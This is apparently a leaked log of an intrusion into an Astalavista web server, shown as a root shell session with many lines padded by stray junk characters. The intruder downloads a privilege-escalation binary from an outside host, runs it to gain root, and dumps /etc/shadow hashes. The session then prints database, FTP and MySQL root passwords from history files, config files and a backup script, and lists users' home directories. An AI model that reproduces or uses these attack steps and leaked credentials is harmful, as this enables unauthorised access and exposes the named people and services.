Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux/ y5 C& d3 j8 [0 E3 Z
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]) \) V9 ^1 t) b: e7 w- r! J
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]* |# e$ b( T. i9 c" L5 x( `8 ^) J
Resolving anti.sec.labs… 13.33.33.37- h4 M" c# z. T2 A+ R: Z/ w
Connecting to anti.sec.labs|13.33.33.37|:80… connected.  r% U% G$ L! t6 |. t
HTTP request sent, awaiting response… 200 OK
' @; ^, |9 ]' V: kLength: 18200 (18K) [text/plain]
1 v7 Y; }( @; m0 _1 E1 p. ?% jSaving to: `g0troot’! r+ J/ e1 h6 q. j, l
/ {% G* s, e' ~
100%[=========================================================================================================================================>] 18,200      58.6K/s   in
4 w( i9 R" G( J% }5 K, I  R0.3s5 ?" ]: X' a8 l6 ~
2 j4 D* z1 U, s9 |+ v
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
: a# T1 ?' k1 t9 F
' }, U6 B7 v! w2 i9 {2 z1 m0 msh-3.2$ ./g0troot -i x86_64/ p9 U8 G8 X- ?
[+] g0troot - anti.sec.labs
0 K( D' R: A9 N[+] Target: 2.6.18-128.1.10.el5
& b3 Y7 V- l3 R2 Z: U  c7 ~# C[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]6 Q* M( S  f( j! j' g8 R

( b  k8 \3 i/ ^2 m! r0 ^[+] r00tr00t; Z! A1 v. P/ k0 n. r1 M; f
[~] Executing shell…
1 v* ?$ O) {. M# r
6 T: M: f# a( U, r& o+ Lsh-3.2# id$ k' R( @$ h8 v6 B! e& l( J1 D
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
  ~2 ]  n, G( Z! ~4 z* D4 r5 l
3 v9 g2 k( k0 f. E- Jsh-3.2# cat /etc/shadow
& G4 G7 O( v; v1 j0 sroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::( F+ @* A$ x. [! ~7 Y  x8 g
[snip]
+ g. ]! N5 {( S* z# D4 F/ Dadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
8 v9 L3 D7 n. q2 J5 e: Tjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::" }5 ~  _+ z, F! q
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::) F2 n% J7 E4 W, d
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
6 m) _/ h9 s: O8 F- g' p7 w+ y" {1 Y% s5 f, V
sh-3.2# cat /etc/motd; P6 \* B) H! c& p( u. [
#####################################################( z: L6 J7 F& N( C7 r
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #8 m9 R* }# B3 l1 e4 l1 Y
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #! p/ V4 V2 P: L* C$ E
# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
- f" Z9 l1 H' j1 T. |7 o2 w6 u2 G#                                                   #
6 ]$ }6 J8 K# U6 O* E9 r" T& T#####################################################4 O, y# f' s4 a# d( i
#                                                   #
, [. d0 ?; O- t; [# Admin Contact - 链接标记support@secureservertech.com      #
, t1 {, c3 u& Q5 U- _) f1 J#                                                   #/ Z0 ^  ~# m$ Y5 N- V
# Available ShortCuts                               #
- |' \, R1 t. S# Z7 x9 b# I#                                                   #6 W* Y! _2 Q# \" @0 u% K) s
# nst -  list active connections                    #
5 Z' p) f; t2 j4 P/ S0 i# W, h; \# ddos - shows how many times each ip is connected  #& G4 {/ V- z6 C* ?" G( U+ M
# ltr -  restart the webserver                      #4 @0 h; {( J1 _. n
# phpc - edit the php config file                   #' a7 Y! U7 `5 j* }( A
# htc -  edit the webserver configuration file      #
7 m: @  B2 G5 a$ _# up -   uptime                                     #8 w- K4 l# ^3 w5 n9 }) S5 Z6 B
# etd - edit the motd of the day file               #
  u6 l! S. \6 B) q/ s3 w# t6 v: Z! K# htr - start and restart apache if needed          #' p, Z: A" ]  B+ N! i
# syng - shows active SYN_RECV connections          #
- ?( N: M7 b9 }- p8 E- s# synd - syn flood blocker - “synd -h” for usage    #
& O& G4 m7 ]" q# K+ d& W+ _7 I#####################################################
" Q, j+ ^: o7 y/ I$ u/ [' r% w- i* Y( s& M# NOTES:                                            #4 D( I" I! Q: Q& i) l0 v! O/ O
# Last Upgrade - 12-08-2008 by JF                   #- N; A' O- d) L
# My.cnf/Mysql Optimization - 1-28-09               #
, r! _7 \  x' g6 d% j1 d% C#                                                   #
4 m) |* I/ w3 c- k* o#                                                   #
, x3 L3 U' Z- P#                                                   #
, A9 o5 K2 O. F#####################################################$ G: C( U9 \: _6 p' A0 {
' T6 T9 q  `& C% n
sh-3.2# lastlog | grep -v Never
: {+ W0 G6 d" ~. c! `Username         Port     From             Latest. T: P$ l  l3 ^% x) }
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
* m3 ~- i! X8 P0 C/ p% k! N2 Uadmin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
+ o- K5 K4 F  X5 x. ecom              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
& a3 J8 @5 d6 l( {astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009- `( n9 |' s% K8 q

4 y5 @6 z) V  l  q" Csh-3.2# ls -la
1 l# S; k+ f. L% T3 q  `) qtotal 453376: ^1 D- `) i8 J  {0 A
drwxr-x— 15 root root       4096 Jun  4 08:40 .9 |( [$ C! F9 m1 r9 J
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..8 J) Y  S/ G: l' F; n
-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip$ h3 C  J  |0 E( ?6 ?) d. r
-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
8 z' C# P9 W! c) ?- E/ B-rw——-  1 root root      16836 Jun  4 07:21 .bash_history, y  A8 d; h! M8 F; X; U
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout" K7 F$ V+ k; y& b5 R5 I
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile/ v9 u6 h& V; k/ ?; b2 a
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
( d) ~% w- e4 l# E' v4 d9 [-rwx——  1 root root       1899 Oct 28  2007 bk.sh
+ u" j  {& p! I- u  c6 `-rw-r–r–  1 root root       1327 Nov 29  2007 cert
' I  [1 D* p0 g/ o* B) F4 z4 F-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql- g& y. I. k" m3 m1 @: k: Q+ _
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan& {2 f, k  D8 O5 A, [
-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc  I9 d' C% X8 \
-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql' ^4 z1 _& L; a% `* k) m
drwx——  2 root root       4096 Oct 28  2007 .elinks
- ^7 ~5 H5 p2 b9 b8 j- Cdrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1$ U2 ^% e% x. Z4 y* m
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
9 y/ }0 ], c! K. G, W& {-rw——-  1 root root          0 Apr 16 13:19 .history
! O3 c2 ]0 i9 ]# b2 _0 w0 l0 E  G-rw-r–r–  1 root root      16095 Sep 11  2007 install.log, v% E3 W8 i/ p, S- L3 r2 D0 i) S
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog
+ ]: W9 P* S! D* \! _-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
5 k2 M( D; k- J5 }8 e$ s0 W& C9 r-rw——-  1 root root         35 Jun  2 14:23 .lesshst/ x  x& Y- V" p1 R1 E* N' g
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp( Q* O6 K3 \3 W6 ^6 v7 F
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
- c5 W; Q0 n: R% [5 ^9 ?-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz: i6 t( W+ x2 e
-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz20 h8 P4 K1 D: c$ ^5 h9 f
-rwx——  1 root root        760 Sep 18  2008 lp" _' `2 i3 F( ], w2 r
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1, g0 x; z8 J$ [
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz: Y7 s) R, h% g
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
% D% @4 G; q1 t9 V' W' Hdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.91 v2 k  J9 f" [3 H  |
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
1 c$ n" [$ ~1 _7 a, s( udrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.37 A% n7 u8 j3 n4 e
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz5 X. j, A7 E+ K& B% \
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
9 f, ]% b( @" C- N* F# }, G* ^# c-rw——-  1 root root         41 Oct 19  2007 .my.cnf
3 k4 C. ]/ R6 D0 Q/ X$ p; i-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history0 L# T  t! {" N2 H+ ?, C* G
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
4 f# g5 g2 R  q" l-rw——-  1 root root         41 May 20  2008 .mytop* I3 t& z5 j- v0 }9 A
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.69 }" G- s1 H$ l+ _
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
/ M/ [2 a7 O! d2 {drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp8 }% T% {6 f7 G" h6 V
-rw——-  1 root root       1462 Sep 21  2007 opt.php
3 x& n% m1 @# g; ^3 i  x- W, o3 R' O-rw-r–r–  1 root root       3371 Sep 22  2007 p: F' D3 i" `0 _4 @
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2+ @2 F* ~& r( H. U* l- q7 \
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
4 H, r% R: ^* \-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
1 w+ }2 o1 ^& C-rw-r–r–  1 root root        887 Nov 28  2007 server.key8 M8 `, b, H* _# y8 D
drwx——  2 root root       4096 Oct 10  2008 .ssh
% S7 F, ^" C: p4 ^0 J$ ?( t-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
) a/ ^! ^0 w0 A1 r3 u-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
- `3 F: V. O$ H& u* W-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
3 a# X6 m# U3 T# ~-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
+ k  @$ N- B+ n  U, y* [7 Tdrwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
% X, ^/ f' Q( a/ A( Q& m( K! u-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh7 ~( U  l- p/ P, V! R: }& D
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
8 L) Q. g( |4 [# @0 @8 C' [-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
8 [6 y3 q& _9 K8 \, \, t4 ~-rw——-  1 root root      12997 May 16  2008 .viminfo! f6 Q. Z4 A" k+ w* G2 G% c. d+ G- w

# f4 E# b# h# Ush-3.2# cat .bash_history) [* w+ W2 v+ {& X2 Z
[snip]+ `; N  Y: G# c  K
wget cp4sst.com/sstlinux.tar.gz
6 F+ D9 v! U' g/ G6 l# `tar zxvf sstlinux.tar.gz) x: j# Q3 p4 P. u5 [( G
cd linux-2.6.27.10
* c7 a9 L8 f( B6 Hsh install.sh% c" L) D6 [* p( d/ V# ~
make bzImage ; make modules ; make modules_install ; make install$ w/ L* B5 ]9 m4 b3 j) }
make clean
9 D+ L1 g+ S' j: A# r! Mservice mysqld restart+ L9 Q; d5 z. R3 J: w
[snip]: Z" R! p2 q9 z" u7 A5 c
cd /usr/sbin/
* w% }) u& Q; a& _( S$ m: rchmod 4777 traceroute/ ]+ I- q+ E8 U1 d# V+ b
chmod 4777 ping
7 e9 @2 Y0 [% a- L, Wtraceroute -I 链接标记[url]www.astalavista.ch[/url]) S; Z* V1 b* z. R  `) [# e; M" Y& F
[snip]. b2 K3 ~; r! ?9 n
vi /etc/csf/csf.conf" Q$ z$ a, K9 t9 b# e- l/ E
traceroute google.ch
% S2 t/ v4 r9 L- [# Qservice csf restart
  P* A  T8 @* j1 L( K) Z1 R4 s3 Etracert google.ch
+ H4 Z: S3 S# W" Uservice csf restart) q6 J! ?8 a6 R9 ~
traceroute 链接标记[url]www.google.ch[/url]0 E2 \6 |- t! B, i5 `! ^5 P
tracert 链接标记[url]www.google.ch[/url]- L' Z$ d  I6 f
traceroute 链接标记[url]www.google.ch[/url]
; R) m4 s( t; g' ?, W* E: klocate traceroute
( s4 [+ t2 k" W5 w+ C% s) R1 Gchown 4755 /bin/traceroute2 c9 k! q* f" T7 ^8 R
chown 4777 /bin/traceroute$ x) `$ ?2 S8 |$ O5 A4 m
locate ping
$ q% v1 Q2 S; u0 J' [. Fchown 4755 /bin/ping
; {5 E0 r! X) k% ?' gchown 4777 /bin/ping& J2 v* u% h2 ?4 E
cd /bin/
7 t! {4 a5 o2 }0 s& u$ \+ {# pls -ali | grep ping
% o( x- s* ~5 \) ~2 h. Q- W6 f! vchown root ping
' [6 Y/ D" O4 {# Ochmod 4755 ping/ _- a' p$ n* H0 e  n
ls -ali | grep traceroute
: G4 v# M7 t+ p# M/ \chown root traceroute
# k6 W! R/ A! U. J- w' qchmod 4755 traceroute
5 S" `) l4 i5 F# q# P7 ils -ali | grep traceroute
- k) Z0 F$ E4 \6 V6 Wtraceroute -I 链接标记[url]www.google.ch[/url]' h' x  a0 L" T5 I0 y# z) Y
traceroute 链接标记[url]www.google.ch[/url]
6 P7 R: @9 M% zwhois pmsantos.ch
4 ~7 N# c+ z& a1 }0 a0 O[snip]( T, |, _' ^) ]4 W- S
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
. I' e+ p  y; I0 E& I" h" _mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql# \& ~/ S( B( k/ y
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql3 [1 l7 Y$ _% x: F
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql! p5 p5 A0 c0 J5 ?1 ]& ~
top
! }( r% `  E5 G# gping ssth.ch
$ p* W: \8 k: p5 nping asdlkfaljgasd???ljg???lasj.ch1 _  F2 |  I" [& n' i2 M" E" O
ping asdlkfaljgasdlasj.ch6 J& L1 E2 I; X# G' @7 ~
ping 链接标记[url]www.ssth.ch[/url]) L/ b0 _* R% K5 K8 R8 I
ping ssth.ch
9 U# b7 X$ l$ P0 N( m. I1 ^nslookup 链接标记[url]www.google.ch[/url]
! z9 _% g+ Q2 ]  C( Hnslookup 链接标记[url]www.ssth.ch[/url]. V* \8 v" b5 M
man nslookup
3 [8 ~( i- H6 ^9 l0 z8 Tping 链接标记[url]www.google.ch[/url]
, k, m8 n/ m, b, [: l2 Dnslookup 链接标记[url]www.google.ch[/url]" j) P( v* Z. C* q( j
nslookup 链接标记[url]www.google.ch[/url]
( m7 Y( M0 x, q2 f( D! S- Wnslookup salfjasdlf.ch
4 V( g) A5 T$ X2 [3 L# {3 l[snip]
! Y; [& }; P  @1 j+ L. g" bopenssl passwd -1 sadf6 G  ]5 P, a8 }+ A' n) d
openssl passwd -1 5cZNHstdTy
' R$ b* q6 u) t; [mysql( R( p0 c. H. l
mysql
. P3 t( i% d& R$ llocate proftp
$ U- Z; Z- y4 J: G/ U) Q2 J3 gvi /etc/proftpd.passwd
. X' l5 Y+ I  X" L/ O7 jservice proftpd restart
9 j+ N  s+ E1 I+ `5 f4 vlocate proftpd.conf
8 L2 d. w9 m- X/ L: ~3 ]5 Jvi /etc/proftpd.conf
3 \1 |' W, C/ F4 G  _5 Mvi /etc/proftpd.passwd
/ B' x: x) r9 _5 R( Cservice proftpd restart1 I' Z  t3 W) Y( ^- {' O* T
[snip]& @" ]4 T7 N% c/ L+ C3 \
/bin/sh /home/com/backup_system/backup.sh
" P; l4 T$ d& ~+ ~2 F4 Gtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
) R+ x* G* u& }9 o8 v, ymysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql; B0 a! t: U) [6 w- g# O0 i; |) o
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
) q+ N( e( A6 r+ Kls -ali  ?# M$ A% u$ G3 ?
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
5 u( |! d$ R( i2 ^mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
, r5 o; T# \2 r) }( @) k* T) bcrontab -l
1 T; I. H/ k/ D# Zcrontab -l
: D' u% C' F6 m; y0 w  a! ~0 ~php -q /home/com/public_html/modifications/cronjobs/securitynews.php( d& H; l0 f$ N9 O
/home/com/public_html/modifications/cronjobs/exploits.sh
* X9 r3 q' a! J. P# X! Fwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
3 D5 j8 e% P) Jtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz- n, Y0 `8 N1 ]! M- {6 C
cd lsws-4.0.3' ]! L3 R. K& a6 `! z
sh install.sh, R' d. B  h8 O3 L$ N
uptime
2 {5 J3 K/ V/ a% {1 I1 k4 {hdparm -tt /dev/sda- P8 g7 y) F* ?2 ]
iostat
2 u; u5 p6 H; R8 u! u( yyum install iostat! P" c- H  k& B4 ?- R
iostat
* c# f: L6 V9 ^$ |whereis iostat- ~; g8 u/ c9 d- F# c6 B
yjm clean all
$ l& E; N3 }0 S5 `4 N% nyum clean all ; yum -y update8 w* J5 O4 f7 `+ p4 o8 `- i
iostat
% _' F+ u: f; B9 n% H* J0 k* h. Myum install systat
7 A" z1 ]. V9 M0 wrpm -qa | grep iostat
$ _+ r# S5 A. a5 _3 z; z9 zrpm -qa | grep sysstat& m. X9 p! @9 c2 k" H
rpm -qa | grep systat
' H' ^, B! @, q0 x, r+ Gdmesg -c' e2 g, S# _% H( H2 P0 F' s
sysctl -p
4 @7 b) h( r: M; a# k2 s* muname -r
$ c. R6 Y! _$ H4 A0 t, kcd /usr/src
0 C) X! x: |/ `  S: \+ E- H/ Bwget nix101.com/kernels/sstlinux.tar.gz
$ M$ [* y5 ]# V4 v( c$ k5 M# `shutdown -r now
% M) N/ v! {4 P4 S! Onano -w /boot/grub/grub.conf
3 j7 y3 V& W* o( i" `+ F4 G6 \, y$ P" |% S. |+ ~" u6 A* x. E5 `
sh-3.2# cat .my.cnf
0 f* @* r4 f2 x+ x: l& d0 F; d! O[client]
# {, x8 i9 j: i& `/ T) Guser=da_admin
' O$ w# H% m" G# Q  d9 upassword=X9dctmRH
/ Z, C: W/ e) K  T, Q
$ @6 P* Z) J# v% V; Esh-3.2# cat /home/com/backup_system/backup.sh
1 o. {( }- z( k+ E7 w- Z#!/bin/sh6 r) c3 J- E* J; l. T
#####################################################################: B3 E# `! C, Q# M2 |" a$ a: T
#                                                                   #; C6 t( Y/ f# t& K. O+ h) ~% p
#   incremental backup for astalavista.com                          #3 B7 b/ A$ B& e1 s
#                                                                   #
. |( K% _  b4 z: f% C" g#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #1 X1 U/ R7 i8 p1 k! l, V
#                                                                   #
: {' ]1 k9 I2 B#####################################################################
7 {) h# q1 `  D. A: _" F, I[snip]
+ |( \! A( \6 O" [: CPROG_DIR=”/home/com/backup_system”;
* E7 p+ F$ f1 y8 n% q2 [5 d. a% vBACKUP_DIR=”/home/com/backups”;
/ J6 e$ r5 j& s7 n  [DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
# e8 T: |. H0 A' x; r+ D+ L# ftp for synology backup server+ o" D7 J* B8 s5 ]& D) F4 t! ~
FTP_HOST=”212.254.194.163″;
, B" y: ^9 p# g8 P6 FFTP_PORT=”21″;
) m1 O: _# I+ o1 w4 U# eFTP_USER=”astalavista.com”;% ]0 ?* ^7 h+ |
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;0 a# s  C; r% h5 y
FTP_DIR=”/astalavista.com”;0 S4 h9 J6 q, E% e. \$ ?: I
# database1 K  f* Q" l. r5 w+ U
DB_HOST=”localhost”;+ [3 ]- x% P" [" G& m0 X
DB_USER=”contrexxuser2″;
5 j2 }: N( i+ [7 {DB_PASS=”0fEYNZgXz1pKe”;
( c1 J- v) x" t- Q: P2 ]DB_DATABASE1=”com_contrexx2_live”;) Q8 A0 ]0 M: g" J8 |9 N! X. i
DB_DATABASE2=”com_contrexx2″;
9 R% v% H! O  v1 X, b[snip]4 b  W: E' A' e: r
ftp -in $FTP_HOST $FTP_PORT <<EOF
" n- C. N( Y) w, {% o  i" v' Equote USER $FTP_USER
% E& c8 b' ?- n9 xquote PASS $FTP_PASS) z4 u5 ~. J3 [# L# R
cd $FTP_DIR# i4 \+ K+ d& ]# t) k1 P1 _( v+ _+ c
put $DB_FULLNAME-SQL_Dump.tar
# B1 Q+ f2 c5 y* |8 Cput $BACKUP_FULLNAME-Public_HTML.tar. a6 f3 J; d* w2 b* x5 ]9 x' o1 s
close
1 s+ a& V* E- ]# ~! gbye
( @8 H4 S" u, Q$ b$ t+ BEOF
0 r/ ^! L; q2 }# I3 }3 f( m3 I. a; J% l# h7 {: m* Z5 U
sh-3.2# cd /home
. L( ]2 r, a; J5 Ash-3.2# ls -la
. P' ~+ e+ M( |4 x/ B, ctotal 120
  v( C. X0 O8 pdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 ., Y- b5 O8 D' F+ M8 v1 c$ @) c
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..6 w! t/ x( v* s! \% P, N* p3 j" K! ]
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin2 d) ~) R8 W: t* |0 S
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
" _5 k4 k  o% W& T* Z' D0 H. M+ n-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
+ k" N5 [9 L, ~6 s2 Q* sdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet: @6 F3 P9 @* i
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
2 ?4 n, }6 w$ q* Q5 `. }9 ]5 fdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
8 n3 w! H0 D2 S* E6 F1 @  ~) ?7 |drwx–x–x 10 com     com      4096 Apr 28 12:40 com0 i$ P! z- ~3 B
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
6 h2 ~0 m9 I' Pdrwx——  3 jon     jon      4096 Sep 21  2007 jon
8 @! \7 Q' V2 O5 F% T- O9 Xdrwx——  2 root    root    16384 Sep 11  2007 lost+found: M4 K; b8 O- F7 |8 S* a* j9 Q2 ?
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my4 W$ R4 N5 t/ ]% n1 @0 \* d
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata. S% A2 k2 M% h( G7 p# @
drwx——  2 jon     jon      4096 Sep 15  2007 test6 {) j- C4 `; t* }
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
6 k+ g# a) l; z+ A) @4 L# s# j
0 d+ ?) j4 u. }3 ssh-3.2# cd admin9 }8 ^( Q1 D! V. o- D' B/ x' V. H0 ~
sh-3.2# ls -la+ K6 X) w7 W9 E" S  K4 I
total 1735896
5 r2 o% k# @& @( Q# d& M! q. wdrwx–x–x  9 admin admin       4096 Nov 28  2007 .; _. L% o, o4 @8 D2 e
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..6 E; Z4 d% x, [) ]; S
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
! }' }: ^. z' R4 E, v% x- Rdrwx——  2 admin admin       4096 Sep 28  2007 backups
0 U8 F0 L2 G  Z7 B' c7 f-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
. `$ h* X+ g" P7 T) s4 Q-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout( Q3 f9 z3 u! G, s" q% @0 _+ {
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
; m7 P% p4 |9 K# l0 L-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
7 j: x. P7 G7 F9 T9 W/ N6 Cdrwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
: l9 T) t# f; edrwx–x–x  6 admin admin       4096 Sep 21  2007 domains
$ ^# h2 a8 }: Y6 f& N2 ^5 z! |drwxrwx—  3 admin mail        4096 Sep 21  2007 imap
2 ~( S/ g4 D, M1 q-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
  x4 `, o; B0 H4 k  C- D% Qdrwx——  2 admin admin       4096 Sep 21  2007 mail# q  |8 m! M# J
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr0 K/ {% @3 j+ m& J# Q
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
% g0 V% |* b& G. b-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow8 q* {% D0 C9 l' r
-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz9 i  E6 C2 i* i. _: ^/ D$ `
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups
5 z. C: b) `8 G' ]; d5 V2 f4 O  Z$ q/ |- ^+ j! P
sh-3.2# ..
' }" m4 P0 k3 Z( v2 w4 A& L1 Fsh-3.2# cd jon
- p" z  @/ K! N( C2 @1 G' `! Nsh-3.2# ls -la
8 `5 l# N# j$ stotal 36
; ~& A( J: L. J0 L, i3 ~! M+ N4 O( Odrwx——  3 jon  jon  4096 Sep 21  2007 .1 z) F1 v% D0 s( Y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..5 u* _( [) ]! n3 p
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
+ j7 k/ E% ]. n2 p* M* k-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout
2 [/ s& @. i9 W) k4 a% j3 R: A-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile0 y7 o% a9 Q3 F' }! y, I6 y' H
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc; H7 ]  H) a2 r. i% R; n4 W+ @! ]1 G
-rw-r–r–  1 root root   24 Sep 21  2007 info.php- O  e2 h) t. r1 S5 h
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
; O5 w' Q) d$ S- i0 T" _
/ k0 P6 F' u" \: _# e, l( Ish-3.2# cd ..& b* U; v# p  I/ u% C& a5 R( ?, C4 C
sh-3.2# cd test3 S, N) ]/ [) H5 z9 W* z+ x/ Z
sh-3.2# ls -la
5 o4 |$ i/ G0 w* ]8 ?* Ttotal 482 l* R; H( U; y' c3 R4 D# {3 F
drwx——  2 jon  jon  4096 Sep 15  2007 .
' V  J6 f0 @, E( Q0 O) E, fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 k2 m+ p+ K: M+ d
-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history6 t; _, d; F- {/ \$ h
-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
8 s' G2 b& N0 c. p2 ]  ~4 t-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile/ [7 b" l" M+ }$ V" P5 o5 s4 R4 Z
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
+ c" X+ X. M. M6 }' V- M$ tsh-3.2# cat .bash_history( m8 p0 O: e. `! A5 f; @
/usr/bin/mysqladmin -u root password PoliuJhytg67! A" d7 O: i. d
, l! K8 [4 D' E# W2 E' F2 G
sh-3.2# cd ..: H1 z% p6 G7 T/ J4 J9 S
sh-3.2# cd astanet- A/ F" @$ D/ d9 v- S3 c  t
sh-3.2# ls -la  v% }# |) ~/ V) U; \( l! D
total 52
2 {# ~( J1 t0 p, s8 ldrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
; [& Z2 |- k( O7 h3 hdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..0 |& s' o1 z' m8 ]$ G: X; Q) U
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth, [$ L! B" d( Y# u, h7 i' W
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history# T) s# _- E9 X" D
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
